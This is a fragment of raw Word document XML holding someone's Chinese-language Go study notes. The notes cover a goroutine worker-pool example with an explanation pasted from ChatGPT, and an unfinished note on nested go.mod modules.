      </w:pPr>
      <w:r w:rsidRPr="00F23BE4">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2677AE7E" w14:textId="77777777" w:rsidR="00F23BE4" w:rsidRPr="00F23BE4" w:rsidRDefault="00F23BE4" w:rsidP="00F23BE4">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="586DF043" w14:textId="77777777" w:rsidR="00F23BE4" w:rsidRPr="00F23BE4" w:rsidRDefault="00F23BE4" w:rsidP="00F23BE4">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F23BE4">
        <w:t>func worker(ports chan int, wg *sync.WaitGroup) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA7280A" w14:textId="77777777" w:rsidR="00F23BE4" w:rsidRDefault="00F23BE4" w:rsidP="00F23BE4">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F23BE4">
        <w:tab/>
        <w:t>for p := range ports {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A9999A" w14:textId="17728ED9" w:rsidR="007C54EC" w:rsidRPr="00F23BE4" w:rsidRDefault="007C54EC" w:rsidP="00F23BE4">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00423C7A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidR="00423C7A" w:rsidRPr="00423C7A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>P receive one value from the chan ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B7B81E" w14:textId="77777777" w:rsidR="00F23BE4" w:rsidRPr="00F23BE4" w:rsidRDefault="00F23BE4" w:rsidP="00F23BE4">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F23BE4">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F23BE4">
        <w:tab/>
        <w:t>fmt.Println("p", p)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1EF804" w14:textId="77777777" w:rsidR="00F23BE4" w:rsidRPr="00F23BE4" w:rsidRDefault="00F23BE4" w:rsidP="00F23BE4">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F23BE4">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F23BE4">
        <w:tab/>
        <w:t>wg.Done()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511D963B" w14:textId="77777777" w:rsidR="00F23BE4" w:rsidRPr="00F23BE4" w:rsidRDefault="00F23BE4" w:rsidP="00F23BE4">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F23BE4">
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77193B09" w14:textId="77777777" w:rsidR="00F23BE4" w:rsidRPr="00F23BE4" w:rsidRDefault="00F23BE4" w:rsidP="00F23BE4">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F23BE4">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFAADCD" w14:textId="77777777" w:rsidR="00F23BE4" w:rsidRPr="00F23BE4" w:rsidRDefault="00F23BE4" w:rsidP="00F23BE4">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34EA49BF" w14:textId="77777777" w:rsidR="00F23BE4" w:rsidRPr="00F23BE4" w:rsidRDefault="00F23BE4" w:rsidP="00F23BE4">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F23BE4">
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1BE7AD" w14:textId="77777777" w:rsidR="00F23BE4" w:rsidRPr="00F23BE4" w:rsidRDefault="00F23BE4" w:rsidP="00F23BE4">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F23BE4">
        <w:tab/>
        <w:t>ports := make(chan int, 100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18938FAC" w14:textId="77777777" w:rsidR="00F23BE4" w:rsidRPr="00F23BE4" w:rsidRDefault="00F23BE4" w:rsidP="00F23BE4">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F23BE4">
        <w:tab/>
        <w:t>var wg sync.WaitGroup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFB7952" w14:textId="77777777" w:rsidR="00F23BE4" w:rsidRPr="00F23BE4" w:rsidRDefault="00F23BE4" w:rsidP="00F23BE4">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D6A35B4" w14:textId="77777777" w:rsidR="00F23BE4" w:rsidRPr="00F23BE4" w:rsidRDefault="00F23BE4" w:rsidP="00F23BE4">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F23BE4">
        <w:tab/>
        <w:t>for i := 0; i &lt; cap(ports); i++ {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9AF80F" w14:textId="77777777" w:rsidR="00F23BE4" w:rsidRPr="00F23BE4" w:rsidRDefault="00F23BE4" w:rsidP="00F23BE4">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F23BE4">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F23BE4">
        <w:tab/>
        <w:t>go worker(ports, &amp;wg)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2B1DBB" w14:textId="77777777" w:rsidR="00F23BE4" w:rsidRPr="00F23BE4" w:rsidRDefault="00F23BE4" w:rsidP="00F23BE4">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F23BE4">
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13207750" w14:textId="77777777" w:rsidR="00F23BE4" w:rsidRPr="00F23BE4" w:rsidRDefault="00F23BE4" w:rsidP="00F23BE4">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F8DEC83" w14:textId="77777777" w:rsidR="00F23BE4" w:rsidRPr="00F23BE4" w:rsidRDefault="00F23BE4" w:rsidP="00F23BE4">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F23BE4">
        <w:tab/>
        <w:t>for i := 1; i &lt; 1024; i++ {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B73D1F" w14:textId="77777777" w:rsidR="00F23BE4" w:rsidRPr="00F23BE4" w:rsidRDefault="00F23BE4" w:rsidP="00F23BE4">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F23BE4">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F23BE4">
        <w:tab/>
        <w:t>wg.Add(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB0BECE" w14:textId="77777777" w:rsidR="00F23BE4" w:rsidRPr="00F23BE4" w:rsidRDefault="00F23BE4" w:rsidP="00F23BE4">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F23BE4">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F23BE4">
        <w:tab/>
        <w:t>ports &lt;- i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5994B7EE" w14:textId="77777777" w:rsidR="00F23BE4" w:rsidRPr="00F23BE4" w:rsidRDefault="00F23BE4" w:rsidP="00F23BE4">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F23BE4">
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39611029" w14:textId="77777777" w:rsidR="00F23BE4" w:rsidRPr="00F23BE4" w:rsidRDefault="00F23BE4" w:rsidP="00F23BE4">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BB5C18B" w14:textId="77777777" w:rsidR="00F23BE4" w:rsidRPr="00F23BE4" w:rsidRDefault="00F23BE4" w:rsidP="00F23BE4">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F23BE4">
        <w:tab/>
        <w:t>wg.Wait()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CEEABA" w14:textId="77777777" w:rsidR="00F23BE4" w:rsidRPr="00F23BE4" w:rsidRDefault="00F23BE4" w:rsidP="00F23BE4">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F23BE4">
        <w:tab/>
        <w:t>close(ports)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0FDDBA" w14:textId="77777777" w:rsidR="00F23BE4" w:rsidRPr="00F23BE4" w:rsidRDefault="00F23BE4" w:rsidP="00F23BE4">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F23BE4">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABA0196" w14:textId="77777777" w:rsidR="00F23BE4" w:rsidRDefault="00F23BE4" w:rsidP="00F23BE4">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6904F37B" w14:textId="77777777" w:rsidR="00E33D08" w:rsidRDefault="00F23BE4" w:rsidP="00F23BE4">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我三问</w:t>
      </w:r>
      <w:r w:rsidR="00E33D08">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>chatGPT:</w:t>
      </w:r>
      <w:r w:rsidR="00E33D08">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00E33D08">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="00E33D08" w:rsidRPr="00E33D08">
        <w:t xml:space="preserve">Does cap(ports) means 100? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169F7443" w14:textId="77777777" w:rsidR="00E33D08" w:rsidRDefault="00E33D08" w:rsidP="00F23BE4">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E33D08">
        <w:t xml:space="preserve">why for i := 1; i &lt; 1024; i++ { means 1024,? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDBA93D" w14:textId="79345EF0" w:rsidR="00F23BE4" w:rsidRPr="00F23BE4" w:rsidRDefault="00E33D08" w:rsidP="00F23BE4">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E33D08">
        <w:t>does it say there are always 100 multi threads?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031C531D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="697739E9" w14:textId="77777777" w:rsidR="00E33D08" w:rsidRPr="00E33D08" w:rsidRDefault="00E33D08" w:rsidP="00E33D08">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E33D08">
        <w:t>Let's break down your code and the questions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF592E3" w14:textId="77777777" w:rsidR="00E33D08" w:rsidRPr="00E33D08" w:rsidRDefault="00E33D08" w:rsidP="00E33D08">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E33D08">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. What does cap(ports) mean?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7110CFE0" w14:textId="77777777" w:rsidR="00E33D08" w:rsidRPr="00E33D08" w:rsidRDefault="00E33D08" w:rsidP="00E33D08">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E33D08">
        <w:t>Yes, cap(ports) refers to the capacity of the ports channel, which is set to 100. This means that the channel can hold up to 100 integers before it blocks any further sends to it. In your code, cap(ports) is used to determine how many worker goroutines are spawned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D03B42B" w14:textId="77777777" w:rsidR="00E33D08" w:rsidRPr="00E33D08" w:rsidRDefault="00E33D08" w:rsidP="00E33D08">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E33D08">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. What does for i := 1; i &lt; 1024; i++ { mean?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0223AFC4" w14:textId="77777777" w:rsidR="00E33D08" w:rsidRPr="00E33D08" w:rsidRDefault="00E33D08" w:rsidP="00E33D08">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E33D08">
        <w:t>This loop runs from 1 to 1023 (inclusive), meaning it will execute 1023 iterations. Each iteration sends an integer i (from 1 to 1023) to the ports channel and increments the WaitGroup counter by one (wg.Add(1)).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1A9306" w14:textId="77777777" w:rsidR="00E33D08" w:rsidRPr="00E33D08" w:rsidRDefault="00E33D08" w:rsidP="00E33D08">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E33D08">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Does it mean there are always 100 multi-threads?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C871616" w14:textId="77777777" w:rsidR="00E33D08" w:rsidRPr="00E33D08" w:rsidRDefault="00E33D08" w:rsidP="00E33D08">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E33D08">
        <w:t xml:space="preserve">No, it doesn't mean there are always 100 threads (goroutines) running. The cap(ports) determines the number of </w:t>
      </w:r>
      <w:r w:rsidRPr="00E33D08">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>worker goroutines</w:t>
      </w:r>
      <w:r w:rsidRPr="00E33D08">
        <w:t xml:space="preserve"> that are created (</w:t>
      </w:r>
      <w:r w:rsidRPr="00E33D08">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>in this case, 100</w:t>
      </w:r>
      <w:r w:rsidRPr="00E33D08">
        <w:t>). These 100 workers are waiting to receive tasks (port numbers) from the ports channel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756730B7" w14:textId="77777777" w:rsidR="00E33D08" w:rsidRPr="00E33D08" w:rsidRDefault="00E33D08" w:rsidP="00E33D08">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E33D08">
        <w:t>Here’s how it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C4DDCF" w14:textId="77777777" w:rsidR="00E33D08" w:rsidRPr="00E33D08" w:rsidRDefault="00E33D08" w:rsidP="00E33D08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E33D08">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>100 worker goroutines</w:t>
      </w:r>
      <w:r w:rsidRPr="00E33D08">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> are created in the first loop</w:t>
      </w:r>
      <w:r w:rsidRPr="00E33D08">
        <w:t xml:space="preserve"> (for i := 0; i &lt; cap(ports); i++).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257E1575" w14:textId="77777777" w:rsidR="00E33D08" w:rsidRPr="00E33D08" w:rsidRDefault="00E33D08" w:rsidP="00E33D08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E33D08">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Each worker continuously waits for a number from the ports channel</w:t>
      </w:r>
      <w:r w:rsidRPr="00E33D08">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7109F960" w14:textId="77777777" w:rsidR="00E33D08" w:rsidRPr="00E33D08" w:rsidRDefault="00E33D08" w:rsidP="00E33D08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E33D08">
        <w:t>As you iterate over the range 1 to 1023, each number is sent to the ports channel and then processed by one of the available worker goroutines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B0C9D8" w14:textId="77777777" w:rsidR="00E33D08" w:rsidRPr="00E33D08" w:rsidRDefault="00E33D08" w:rsidP="00E33D08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E33D08">
        <w:t>The WaitGroup is used to ensure that the main function waits for all tasks to be completed before closing the ports channel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673C2195" w14:textId="77777777" w:rsidR="00E33D08" w:rsidRPr="00E33D08" w:rsidRDefault="00E33D08" w:rsidP="00E33D08">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E33D08">
        <w:t>So, to clarify:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E1413A" w14:textId="77777777" w:rsidR="00E33D08" w:rsidRPr="00E33D08" w:rsidRDefault="00E33D08" w:rsidP="00E33D08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E33D08">
        <w:t>You have 100 goroutines running concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448FF75B" w14:textId="77777777" w:rsidR="00E33D08" w:rsidRPr="00E33D08" w:rsidRDefault="00E33D08" w:rsidP="00E33D08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E33D08">
        <w:t>These goroutines process the 1023 tasks as they are sent to the ports channel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62113B1E" w14:textId="77777777" w:rsidR="00E33D08" w:rsidRPr="00E33D08" w:rsidRDefault="00E33D08" w:rsidP="00E33D08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E33D08">
        <w:t>The 100 goroutines will process tasks as fast as possible, but the channel's capacity or the number of tasks does not directly limit the number of goroutines running concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A15DEAA" w14:textId="77777777" w:rsidR="00E33D08" w:rsidRPr="00E33D08" w:rsidRDefault="00E33D08" w:rsidP="00E33D08">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E33D08">
        <w:t>In summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440C07C2" w14:textId="77777777" w:rsidR="00E33D08" w:rsidRPr="00E33D08" w:rsidRDefault="00E33D08" w:rsidP="00E33D08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E33D08">
        <w:t>cap(ports) determines the number of goroutines (workers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C927BD0" w14:textId="77777777" w:rsidR="00E33D08" w:rsidRPr="00E33D08" w:rsidRDefault="00E33D08" w:rsidP="00E33D08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E33D08">
        <w:t>The 1024 in the loop defines the number of tasks that need to be processed by those goroutines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333C17DF" w14:textId="77777777" w:rsidR="00E33D08" w:rsidRPr="00E33D08" w:rsidRDefault="00E33D08" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70AD34BB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="319" w:name="_Toc159779776"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>go mod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否支持子模块？</w:t>
      </w:r>
      <w:bookmarkEnd w:id="319"/>
    </w:p>
    <w:p w14:paraId="3FCCE8CA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>！此处我的调研不完善。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330B6BB8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58303F9E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>鹏哥的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gitlab-misconfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目中，主目录下有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>go.mod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但是某个被设定的软件包下也有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>go.mod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。在进行编译时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">go mod tidy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法对子模块产生影响。推测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>go.mod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法像</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>maven</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目那样可以大项目包含小项目。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E057F11" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43E893E1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>go.mod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会识别绕开子项目，推测可能会有层级项目的编译机制。待完善此处内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7DFD5F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="186E0F2A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>删除子项目的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>go.mod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和不删除的情况下，主项目的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>go.mod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>经过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tidy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的对比如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51487614" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="4B4C000A" wp14:editId="3DAA56ED">
            <wp:extent cx="3719830" cy="1939290"/>
            <wp:effectExtent l="0" t="0" r="13970" b="11430"/>
            <wp:docPr id="49" name="图片 49" descr="DApEHRhkx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DApEHRhkxL"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId100"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3719830" cy="1939290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E6C377" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26E5A325" w14:textId="35F1F723" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EA2C64B" w14:textId="2A6F8F6C" w:rsidR="001C1437" w:rsidRDefault="001C1437" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
